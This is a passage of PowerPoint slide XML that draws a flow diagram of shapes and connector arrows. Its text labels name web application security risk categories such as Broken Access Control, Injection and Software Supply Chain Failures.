          <a:ln w="53975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68" name="Straight Arrow Connector 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{718A6A11-881E-8753-2AB6-F2398F36CDC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4804374" y="197964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9" name="Straight Arrow Connector 93">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A9F3433-2AB8-425A-C5F8-B726CAF57037}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3652200" y="589500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0" name="Straight Arrow Connector 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C837BBDC-644D-92A0-9083-3B3F1FF683A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074960" y="4901760"/>
            <a:ext cx="40716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1" name="Straight Arrow Connector 96">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80E608D0-B59C-AF83-6D66-581D9180FAD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3628080" y="2913480"/>
            <a:ext cx="40716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2" name="Straight Arrow Connector 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B13C52D-4F0D-E1AC-DD0F-523C94E05772}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2358720" y="291348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3" name="Straight Arrow Connector 98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75FC2556-4B81-C06D-6709-7DB3E2B24617}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1214" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2416680" y="3414060"/>
            <a:ext cx="362880" cy="1980"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1275" name="Straight Arrow Connector 100">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BE40867-0916-D736-8740-69E17E1162D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="1193" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4889340" y="1428840"/>
            <a:ext cx="436500" cy="540"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975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76" name="Connector: Curved 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD915096-0531-8D5A-325D-4E9E93FA7EFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1222" idx="3"/>
            <a:endCxn id="1218" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1173600" y="3910140"/>
            <a:ext cx="31212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8" name="Straight Arrow Connector 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26DF46E0-2DF6-C1BB-5445-C96C83220D75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2369160" y="536760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9" name="Connector: Curved 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{219B815C-E7DA-F45F-2335-107B38E10CC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1204" idx="3"/>
            <a:endCxn id="1200" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3695400" y="1925460"/>
            <a:ext cx="343440" cy="493200"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000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82" name="Connector: Curved 107">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CDA296B-0482-BAB1-B5A5-40FCE811726D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1205" idx="3"/>
            <a:endCxn id="1201" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6251760" y="1925460"/>
            <a:ext cx="34164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83" name="Connector: Curved 108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0609E4F-49AE-46FE-66B5-02AF840D6C97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1199" idx="3"/>
            <a:endCxn id="1227" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251760" y="1925460"/>
            <a:ext cx="341640" cy="248076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sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1284" name="Connector: Curved 109">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A948571-CB8A-C8C0-B6A5-8EAFC9CE9D63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1244" idx="3"/>
            <a:endCxn id="1247" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6265440" y="2920860"/>
            <a:ext cx="325440" cy="493200"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 52266"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1285" name="Connector: Curved 110">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C30DB7DA-AEAE-4751-0530-65B0BFB781CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1246" idx="3"/>
            <a:endCxn id="1247" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6253560" y="3414060"/>
            <a:ext cx="33732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808080">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1287" name="Connector: Curved 112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{957C00BE-B0FC-317C-4451-7108D33B23C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1245" idx="3"/>
            <a:endCxn id="1246" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4967640" y="3414060"/>
            <a:ext cx="35640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sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1288" name="Straight Arrow Connector 113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C3715D2-5960-1D3A-65AD-9B488AF80B5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2383560" y="3899160"/>
            <a:ext cx="39564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90" name="Connector: Curved 115">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D9944F4-5029-8D2F-6239-CE30B326FEEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1224" idx="3"/>
            <a:endCxn id="1220" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3695400" y="3910140"/>
            <a:ext cx="343440" cy="487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sp>
        <p:nvSpPr>
          <p:cNvPr id="1292" name="CustomShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30F2B25D-026A-FDC1-B126-B5713316F899}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7882200" y="122004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Broken Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" strike="noStrike" spc="-1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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93" name="CustomShape 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ECCFC03-A11F-5FC0-CC36-A6BE37AD946A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="269100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Cryptographic Failures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94" name="CustomShape 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E86A8160-DBCB-6CB9-EDB6-427E010EE77A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="3683160"/>
            <a:ext cx="933480" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:srgbClr val="FFE575"/>
            </a:fgClr>
            <a:bgClr>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr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Insecure </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1000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Design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95" name="CustomShape 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6CD1669-E72C-D8DE-B11F-EEF7144AB5DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="219456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Software Supply Chain Failures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96" name="CustomShape 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B68EBD3B-40B8-2D63-7DB1-661AA8D8B1EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="417924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Authentication Failures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97" name="CustomShape 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4486AAE-9039-CF6A-6A7D-D00D438D3D3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="4675680"/>
            <a:ext cx="933480" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:srgbClr val="FFE575"/>
            </a:fgClr>
            <a:bgClr>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr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Software &amp; Data Integrity Failures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98" name="CustomShape 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{968ACA04-1254-348F-3A99-10543EFCBF4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="517176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Yu Mincho Demibold"/>
              </a:rPr>
              <a:t> Logging &amp; Alerting Failures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99" name="CustomShape 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A0910DE-8AE8-B463-7CDC-C9F5FFCF54F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="566784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Mishandling Exceptional Conditions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300" name="CustomShape 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70FF9152-FAD8-29C6-2958-7166F553AC44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7872120" y="1698480"/>
            <a:ext cx="93888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.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" strike="noStrike" spc="-1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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301" name="Straight Arrow Connector 126">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24F2B5C3-F517-45EC-A817-F49253AA4954}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1195" idx="3"/>
            <a:endCxn id="1292" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7517880" y="1429200"/>
            <a:ext cx="36468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sp>
        <p:nvSpPr>
          <p:cNvPr id="1302" name="CustomShape 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{684EB1A5-2DA2-F62F-32E8-50D3985E2B26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6588720" y="4693320"/>
            <a:ext cx="933480" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:srgbClr val="FFE575"/>
            </a:fgClr>
            <a:bgClr>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr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Software &amp; Data Integrity Failures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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1303" name="Straight Arrow Connector 136">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98E2E5BA-3121-5AE3-BC47-ACAC174E84FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7462080" y="5381280"/>
            <a:ext cx="40356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sp>
        <p:nvSpPr>
          <p:cNvPr id="1305" name="CustomShape 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0713AEC-1E86-1C4B-821D-4D3C1B119ECD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7879320" y="3187080"/>
            <a:ext cx="924480" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE57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spc="-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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" strike="noStrike" spc="-1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306" name="Straight Arrow Connector 160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B94C70BD-C4BA-0AB9-EFA9-D0C43FC6F5E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481160" y="4365000"/>
            <a:ext cx="40356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07" name="Connector: Curved 168">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9F087C9-C233-7F25-2422-41B8BEDDEB08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1212" idx="3"/>
            <a:endCxn id="1294" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7517880" y="2917980"/>
            <a:ext cx="357120" cy="974520"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:lumMod val="85000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1308" name="Straight Arrow Connector 169">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E62FA313-E5DE-763F-9A9C-981C0D186C16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="1297" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7517160" y="4884840"/>
            <a:ext cx="358200" cy="3600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975">
            <a:solidFill>
              <a:srgbClr val="FFE575"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1311" name="CustomShape 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE71B8E4-F053-2811-868D-856D470D8939}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="469332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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1312" name="Connector: Curved 163">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{266629C5-D883-169D-BF8D-606FEBC465B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1247" idx="3"/>
            <a:endCxn id="1300" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7520400" y="1907640"/>
            <a:ext cx="352080" cy="1506600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 51279"/>
              <a:gd name="adj2" fmla="val 49976"/>
              <a:gd name="adj3" fmla="val 48925"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1313" name="Connector: Curved 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A369D6F8-4A5F-E4E2-A54D-B303FD8C8433}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1235" idx="3"/>
            <a:endCxn id="1221" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6251760" y="3910140"/>
            <a:ext cx="341640" cy="148860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14" name="Straight Arrow Connector 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30FE0408-7C83-6F9B-B3C8-69D1630D8B62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4922280" y="5395680"/>
            <a:ext cx="40716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16" name="Connector: Curved 133">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AB123D3-1BAD-3EED-B2FA-57F1BE4FFDD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1201" idx="3"/>
            <a:endCxn id="1293" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7517880" y="1925280"/>
            <a:ext cx="357480" cy="975240"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50403"/>
              <a:gd name="adj2" fmla="val 50036"/>
              <a:gd name="adj3" fmla="val 49596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17" name="Connector: Curved 127">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E854739-3A81-BC38-AEC1-E28D8947E9FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1221" idx="3"/>
            <a:endCxn id="1295" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7517880" y="2403720"/>
            <a:ext cx="357480" cy="1506600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50403"/>
              <a:gd name="adj2" fmla="val 49976"/>
              <a:gd name="adj3" fmla="val 49596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15" name="Connector: Curved 130">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3F1E366-7AD3-2DD5-4746-D18F0B19843A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7477920" y="2418660"/>
            <a:ext cx="361440" cy="974880"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43879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289" name="Connector: Curved 114">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A42474FD-AC48-6B5F-3787-72CFC720111C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1234" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
